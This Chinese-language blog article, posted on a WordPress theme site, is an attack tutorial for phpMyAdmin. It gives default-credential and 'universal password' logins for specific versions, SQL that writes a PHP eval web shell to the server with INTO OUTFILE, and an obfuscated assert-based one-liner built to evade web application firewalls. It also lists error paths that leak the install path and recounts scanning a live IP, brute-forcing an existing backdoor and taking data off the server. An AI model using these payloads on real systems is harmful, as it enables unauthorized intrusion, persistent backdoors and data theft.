首页 技术文章 数据库 分析PHPmyadmin漏洞以及拿shell的介绍
正文 评论

分析PHPmyadmin漏洞以及拿shell的介绍

下面由phpmyadmin教程栏目给大家介绍关于PHPmyadmin漏洞和拿shell,希望对需要的朋友有所帮助!

分析PHPmyadmin漏洞以及拿shell的介绍

phpmyadmin的漏洞相对来说,还是比较多的,对于新手来说,分享几个漏洞,深入的处于代码审计方面的也可以和我讨论
phpmyadmin2.11.3-2.11.4 这两个版本存在万能密码,直接使用‘localhost’@'@”为账号,密码不用输入。

phpmyadmin2.11.9.2 这个版本存在空口令。直接root用户登陆,密码不用

找这个的话 用自己的写的脚本,或者搜素引擎什么的,这里懂的人就懂了,不懂也不在这里。

关于拿shell,----》root权限,并且有写文件权限 ----》导出的目录有写权限 ----》有的情况下,就算你这两个都有,但是服务器的一些配置还是会对这个有影响。

在getshell之前先进入一个数据库

第一种,使用sql语句,创建一个表,添加一个字段,字段的内容为一句话,然后导出到php文件中,最后删除这个表,这个是最保险的方法
Create TABLE 表 (列 text NOT NULL)
Insert INTO 表 (列) VALUES('<?php eval($_POST[mima])?>')
select 列 from 表 into _utfile '路径'
Drop TABLE IF EXISTS 表;
第二种方法,这个是直接写入
select '一句话'INTO _UTFILE '路径'
还有几种方法,大致原理都一样。
然后,一般的话,一句话都是

<?php @eval($_POST[x])?>

有狗的话,用免杀一句话,下面这个是我过年前构造的过狗一句话,现在应该还可以过

<?php
$a = 's';
$str = str_repeat($a,2);
$to = $_POST;
//echo $str;
$exp = 'a'.$str[0].$str[1].'e'.'r'.'t';
$exp($to['x'])
?>

找路径的话,

1// 利用phpinfo.php
2//利用phpmyadmin的一些文件报错,下面都是网上通用的
/phpMyAdmin/index.php?lang[]=1
/phpMyAdmin/phpinfo.php
/load_file()
/phpmyadmin/themes/darkblue_orange/layout.inc.php
/phpmyadmin/libraries/select_lang.lib.php
/phpmyadmin/libraries/lect_lang.lib.php
/phpmyadmin/libraries/mcrypt.lib.php
/phpmyadmin/libraries/export/xls.php

3//再者就是利用网站包路径,这些会的都会了,不会的慢慢的就会了。

下面开始实战,脚本扫到一个IP,显示存在phpmyadmin,打开

分析PHPmyadmin漏洞以及拿shell的介绍

一看这些php文件就是后门一句话,放到几万字典爆破,两秒钟

分析PHPmyadmin漏洞以及拿shell的介绍

直接菜刀链接。。。。。
这个肯定被人搞了,直接打包好东西,你懂的。。。提权什么的就不必要了。

分析PHPmyadmin漏洞以及拿shell的介绍

以上就是分析PHPmyadmin漏洞以及拿shell的介绍的详细内容,更多请关注主题君其它相关文章!

-=||=-收藏赞 (0)
更多主题
单栏极简文艺WordPress博客主题:Diaspora主题
¥ 0 关注:20,067
详情
简约黑白WordPress个人博客主题:Personal主题
¥ 0 关注:20,018
详情
v1.0.0
小程序收录免费WordPress主题:XCX主题
¥ 0 关注:19,648
详情
v1.0.0
一款简约单栏的免费WordPress博客主题:itheme主题
¥ 0 关注:18,129
详情
功能丰富切轻量的WordPress虚拟资源主题:Rizhuti主题
¥ 599 关注:18,018
详情
大气优雅免费WordPress博客主题:HONEY主题
¥ 0 关注:14,871
详情
回复
暂无评论

不要再留垃圾评论了,主题君整理资源不容易,留几句鼓励的话吧。